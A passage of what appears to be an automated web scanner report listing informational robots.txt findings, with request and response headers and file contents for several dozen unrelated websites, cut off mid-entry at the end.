HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:37:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 05 Jun 2008 18:01:02 GMT
ETag: "404a034-cc-20d7b380"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.803. http://www.homemademedicine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homemademedicine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homemademedicine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:13:06 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 00:20:35 GMT
ETag: "8fac47b-26a-49288adbe9ac0"
Accept-Ranges: bytes
Content-Length: 618
Connection: close
Content-Type: text/plain

User-agent: Titan
Disallow: /
User-agent: EmailCollector
Disallow: /
User-agent: EmailSiphon
Disallow: /
User-agent: EmailWolf
Disallow: /
User-agent: ExtractorPro
Disallow: /
User-agent: *

...[SNIP]...

27.804. http://www.homemakers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homemakers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homemakers.com

Response

HTTP/1.1 200 OK
Age: 2
Date: Wed, 04 May 2011 03:17:35 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 2
ETag: "adc3c1-1594-470f6c0196c80"
Last-Modified: Wed, 12 Aug 2009 19:23:14 GMT
Accept-Ranges: bytes
Content-Length: 5524
Keep-Alive: timeout=15, max=88
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /register


###
#Unsafe robots to keep away
###
User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: BackDoorBo
...[SNIP]...

27.805. http://www.homepage-baukasten.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homepage-baukasten.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homepage-baukasten.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:12 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 12:07:09 GMT
ETag: "40fd-19-486647b389540"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-15

User-Agent: *
Allow: /



27.806. http://www.homeplaza.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeplaza.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homeplaza.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.193.214.243.1304474707818137; path=/; expires=Fri, 03-Jun-11 02:05:07 GMT
Last-Modified: Fri, 07 Jan 2011 02:21:06 GMT
ETag: "813f57-208c-499384541c880"
Accept-Ranges: bytes
Content-Length: 8332
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8


# Robots.txt file from http://www.searchengineworld.com
#
# Built from text file http://info.webcrawler.com/mak/projects/robots/active/all.txt
#
# This restricts access to only known and registere
...[SNIP]...

27.807. http://www.homeschoolreviews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeschoolreviews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homeschoolreviews.com

Response

HTTP/1.1 200 OK
Content-Length: 49
Content-Type: text/plain
Last-Modified: Tue, 11 Nov 2008 05:25:58 GMT
Accept-Ranges: bytes
ETag: "e61da3fabd43c91:757"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:27 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:


27.808. http://www.homesincolorado.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homesincolorado.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homesincolorado.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:20 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
Last-Modified: Thu, 15 Oct 2009 13:52:42 GMT
ETag: "9e-475f997dd1e80"
Accept-Ranges: bytes
Content-Length: 158
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI CURa ADMa CAO DEVa TAIa OUR BUS IND UNI COM PSA NAV INT"
Connection: close
Content-Type: text/plain

# Homes in Colorado http://www.homesincolorado.com robots.txt

User-agent: *
Disallow: /test/
Disallow: /listings/query.php
Disallow: /company/disclaimer.php

27.809. http://www.hometryst.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hometryst.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hometryst.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:32 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 20 Jul 2010 04:39:10 GMT
ETag: "2a018-ae-48bca44287780"
Accept-Ranges: bytes
Content-Length: 174
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Yandex
Disallow: /

User-agent: Baiduspider
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: *
Disallow:

Sitemap: http://hometryst.com/sitemap.xml.gz


27.810. http://www.hondacivicforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hondacivicforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hondacivicforum.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:00:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Last-Modified: Mon, 04 Apr 2011 03:43:28 GMT
ETag: "668b02-44b-4a00f900599d4"
Accept-Ranges: bytes
Content-Length: 1099
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerAFUWEB_www_pool=1106972844.20480.0000; path=/
Vary: Accept-Encoding

User-agent: *

Disallow: /cgi-bin
Disallow: /fb
Disallow: /archive
Disallow: /MembersRides
Disallow: /MemberRides
Disallow: /albumphoto
Disallow: /phot
...[SNIP]...

27.811. http://www.hondapartshouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hondapartshouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hondapartshouse.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 20 Mar 2008 12:59:58 GMT
Accept-Ranges: bytes
ETag: "8e301f4d8a8ac81:62d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:45:16 GMT
Connection: close

User-agent: *

Disallow:

27.812. http://www.hoodtocoast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoodtocoast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hoodtocoast.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:44 GMT
Server: Apache/2.0.54
Last-Modified: Sat, 25 Sep 2010 23:48:32 GMT
ETag: "c0b9ef9-57-21fb3400"
Accept-Ranges: bytes
Content-Length: 87
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /images/
Disallow: /includes/
Disallow: /htc/

27.813. http://www.hooverfence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hooverfence.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hooverfence.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:18 GMT
Server: Apache
Last-Modified: Sat, 10 Jul 2010 07:49:27 GMT
ETag: "246918e-aa-4c382607"
Accept-Ranges: bytes
Content-Length: 170
Connection: close
Content-Type: text/plain

#
# robots.txt file for hooverfence.net
#
User-agent: *
Disallow: /cgi-bin
Disallow: /catalog/entry_systems/osco/Invisa.wmv
Disallow: /catalog/hardware/oz-post/videos



27.814. http://www.horseadvice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.horseadvice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.horseadvice.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 30 Jun 2008 15:42:35 GMT
ETag: "27ff44-143-450e41bbd50c0"
Accept-Ranges: bytes
Content-Length: 323
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt file for http://www.horseadvice.com
User-agent: *
Disallow: /messages/2/
Disallow: /cgi-bin
Disallow: /php
Disallow: /sbs/
Disallow: /advisor/
Disallow: /equinetest/
Disallow:
...[SNIP]...

27.815. http://www.horseforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.horseforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.horseforum.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:19 GMT
Server: Apache
Last-Modified: Mon, 08 Dec 2008 17:26:02 GMT
Accept-Ranges: bytes
Content-Length: 1165
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#ALL BOTS
User-agent: *
Disallow: /admincp/
Disallow: /ajax.php
Disallow: /clientscript/
Disallow: /cpstyles/
Disallow: /images/
Disallow: /includes/
Disallow: /install/
Disallow: /modcp/
Disallow: /s
...[SNIP]...

27.816. http://www.hostesscakes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hostesscakes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hostesscakes.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Aug 2009 04:20:55 GMT
Accept-Ranges: bytes
ETag: "5e2d6718420ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:41:55 GMT
Connection: close
Content-Length: 1432

User-Agent: *

#expired promotions
Disallow: /strikeitrich
Disallow: /santaclaus.asp
Disallow: /images/bio
Disallow: /tf_hostess_rebate.pdf
Disallow: /downloads
Disallow: /promotions/don
...[SNIP]...

27.817. http://www.hotboyscute.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotboyscute.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotboyscute.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Last-Modified: Sun, 26 Jul 2009 13:09:19 GMT
ETag: "75e69b-18-46f9b8b911dc0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /


27.818. http://www.hotdog.hu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotdog.hu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotdog.hu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:59 GMT
Server: Apache
Vary: Host
Last-Modified: Mon, 11 Apr 2011 08:12:30 GMT
Accept-Ranges: bytes
Content-Length: 843
W: w28
Connection: close
Content-Type: text/plain; charset=iso-8859-2

User-agent: *
Disallow: /kutyagocsi/
Disallow: /xmas/
Disallow: /valentin/
Disallow: /valentin_nap/
Disallow: /tojgli/
Disallow: /sms/
Disallow: /szertar/
Disallow: /szertar2/
Disallow: /nyeremenyjate
...[SNIP]...

27.819. http://www.hotelguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotelguide.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AFC5FBBB1ABDA671743319E67753BE12; Path=/
ETag: W/"87-1302690714000"
Last-Modified: Wed, 13 Apr 2011 10:31:54 GMT
Content-Type: text/plain
Content-Length: 87
Date: Wed, 04 May 2011 01:31:24 GMT
Connection: close
Server: JBoss 4.2

Sitemap: http://www.hotelguide.com/sitemap.xml

User-agent: *
Disallow: /linkMe.seam

27.820. http://www.hotgirlsin3d.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotgirlsin3d.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotgirlsin3d.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.hotgirlsin3d.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=4efd862e8e31fecd7eaa249a10995713; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.hotgirlsin3d.com/sitemap.xml.gz

27.821. http://www.hotlilteens.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotlilteens.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotlilteens.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:51:54 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://hotlilteens.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://hotlilteens.com/sitemap.xml.gz

27.822. http://www.hotmenshairstyles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotmenshairstyles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotmenshairstyles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:14 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.hotmenshairstyles.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.823. http://www.hotref.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotref.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotref.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:05 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /write.php
Disallow: /bookmark.php
Disallow: /community_new.php
Disallow: /sample_design.php

27.824. http://www.hottiearcade.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hottiearcade.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hottiearcade.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=548DF00075D71379EE753DFB4F25CA1F; Path=/
ETag: W/"150-1258525446000"
Last-Modified: Wed, 18 Nov 2009 06:24:06 GMT
Content-Type: text/plain
Content-Length: 150
Date: Wed, 04 May 2011 02:00:59 GMT
Connection: close

User-agent: *
Disallow: /browserSearch.do
Disallow: /toolbarSearch.do
Disallow: /searching.do
Disallow: /addrSearch.do
Disallow: /pageNotFound.do

27.825. http://www.housefabric.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.housefabric.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.housefabric.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 43
Date: Wed, 04 May 2011 01:20:18 GMT
Content-Type: text/plain
ETag: "2d7a677236c41:0"
Server: Microsoft-IIS/7.0
Last-Modified: Tue, 09 Mar 2004 22:11:27 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

User-Agent: *
Disallow: /housefab_admin/

27.826. http://www.howdini.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howdini.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howdini.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:20 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 26 Apr 2011 00:19:55 GMT
ETag: "508147-10a-489300c0"
Accept-Ranges: bytes
Content-Length: 266
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /NEW
Disallow: /FWD
Disallow: /cgi-bin
Disallow: /includes
Disallow: /uplaylist.php
Disallow: /H_view_video.php?viewkey
Disallow: /channel_detail.php
Disallow: /ufavour.php
Dis
...[SNIP]...

27.827. http://www.howtobefit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtobefit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtobefit.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 26 Feb 2009 23:51:16 GMT
ETag: "25919e8-717-729a500"
Accept-Ranges: bytes
Content-Length: 1815
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /graphics/
Disallow: /images/
Disallow: /keywordranking/
Disallow: /pics/
Disallow: /reports/
Disallow: /polar-body-age-test/
Disallow: /backup.Merchant2/
D
...[SNIP]...

27.828. http://www.howtocleanthings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtocleanthings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtocleanthings.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:57 GMT
Server: Apache
Last-Modified: Tue, 28 Sep 2010 14:21:58 GMT
ETag: "9fc011-18-49152914e0d80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.829. http://www.howtocookmeat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtocookmeat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtocookmeat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:18 GMT
Server: Apache
Last-Modified: Fri, 16 Jan 2009 19:51:58 GMT
ETag: "1978382-84-4609ee7dd9380"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.830. http://www.howtoforge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtoforge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtoforge.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:34:26 GMT
Server: Apache
Last-Modified: Tue, 06 May 2008 08:35:19 GMT
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Content-Type: text/plain
Age: 285
X-Cache: HIT from www.howtoforge.com
X-Cache-Lookup: HIT from www.howtoforge.com:80
Via: 1.1 www.howtoforge.com:80 (squid/2.7.STABLE3)
Connection: close

User-Agent: *
Disallow: /forums/member.php
Allow: /

27.831. http://www.howtohaven.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtohaven.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtohaven.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:45 GMT
Server: Apache
X-UA-Compatible: IE=EmulateIE8
X-FRAME-OPTIONS: SAMEORIGIN
Last-Modified: Wed, 24 Sep 2008 09:36:43 GMT
ETag: "57480d-300-48da0a2b"
Accept-Ranges: bytes
Content-Length: 768
Connection: close
Content-Type: text/plain

User-agent: W3C-checklink
Disallow: /

User-agent: peerbot
Disallow: /favicon.ico

User-agent: MSIECrawler
Disallow: /

User-agent: Googlebot-Image
Disallow: /

User-agent: psbot
Disallow: /

User-age
...[SNIP]...

27.832. http://www.howtradestocksonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtradestocksonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtradestocksonline.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:28:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=308a6fd5dc6f8fcaf5394c1b156c9002; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://howtradestocksonline.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://howtradestocksonline.com/sitemap.xml.gz

27.833. http://www.hpfeedback.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hpfeedback.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hpfeedback.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2005 14:19:46 GMT
Accept-Ranges: bytes
ETag: "ce1875dbc536c51:7e9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:42:13 GMT
Connection: close

User-agent: *
Disallow: /

27.834. http://www.hrmorning.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrmorning.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hrmorning.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: user=204.89.60.250.1304469846262661; path=/; expires=Wed, 04-May-11 04:44:06 GMT
X-Powered-By: W3 Total Cache/0.8.5.1
X-Pingback: http://www.hrmorning.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8
Set-Cookie: Coyote-2-cc593cc2=d059172d:0; path=/

User-agent: *
Disallow:

27.835. http://www.hrs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hrs.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 28 Apr 2011 08:39:38 GMT
Content-Type: text/plain
Date: Wed, 04 May 2011 03:31:57 GMT
Content-Length: 2308
Connection: close

User-agent: *
Sitemap: http://www.hrs.com/sitemap.xml
Allow: /hotels/
Disallow: /?
Disallow: /*jsessionid
Disallow: /web3/hotelData.do?
Disallow: /CVS/
Disallow: /IPX/
Disallow: /ad-hrs/
Disallow: /ae
...[SNIP]...

27.836. http://www.hubcaps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hubcaps.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hubcaps.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:33 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/1.0.0c DAV/2 PHP/5.2.12 with Suhosin-Patch
Last-Modified: Thu, 20 May 2010 22:43:47 GMT
ETag: "2a6f4d-32-4870e4ebacec0"
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /logs/

27.837. http://www.humiliation.me/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.humiliation.me
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.humiliation.me

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:58:55 GMT
Content-Type: text/plain
Content-Length: 212
Last-Modified: Thu, 19 Aug 2010 13:52:54 GMT
Connection: close
Expires: Wed, 11 May 2011 01:58:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

User-agent: *
Disallow: /signup/
Disallow: /signup
Disallow: /administration/
Disallow: /cgi-bin/
Disallow: /configs/
Disallow: /js/
Disallow: /media/
Disallow: /modules/
Disallow: /styles/
Disallow:
...[SNIP]...

27.838. http://www.hunterfan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunterfan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hunterfan.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 681
Content-Type: text/plain
Last-Modified: Mon, 11 Oct 2010 14:36:54 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:56:45 GMT
Connection: close

User-Agent: *
Disallow: /App_Browsers
Disallow: /App_Data
Disallow: /AssetManagement
Disallow: /assets
Disallow: /bin
Disallow: /classes
Disallow: /controls
Disallow: /css
Disallow: /flash
D
...[SNIP]...

27.839. http://www.hunting-fishing-gear.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunting-fishing-gear.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hunting-fishing-gear.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:20 GMT
Server: Apache/2.2.15
Last-Modified: Thu, 25 Jan 2007 16:36:22 GMT
ETag: "1ce027-55-427e002ebad80"
Accept-Ranges: bytes
Content-Length: 85
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dbpix/
Disallow: /images/
#
# Created on 16JAN06 --->MB/IMR

27.840. http://www.huntingtripsrus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huntingtripsrus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huntingtripsrus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:50 GMT
Server: Apache
Last-Modified: Fri, 30 Dec 2005 21:25:36 GMT
ETag: "789bf810-104-4092a79591400"
Accept-Ranges: bytes
Content-Length: 260
Connection: close
Content-Type: text/plain

# /robots.txt as defined in
# <http://info.webcrawler.com/mak/projects/robots/exclusion.html>

User-agent: *
Disallow: /admin/
Disallow: /bin/
Disallow: /data/
Disallow: /etc/
Disallow: /icons/
Disall
...[SNIP]...

27.841. http://www.hypetrak.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hypetrak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hypetrak.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:01:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Vary: Cookie
X-Pingback: http://hypetrak.com/xmlrpc.php
Connection: close
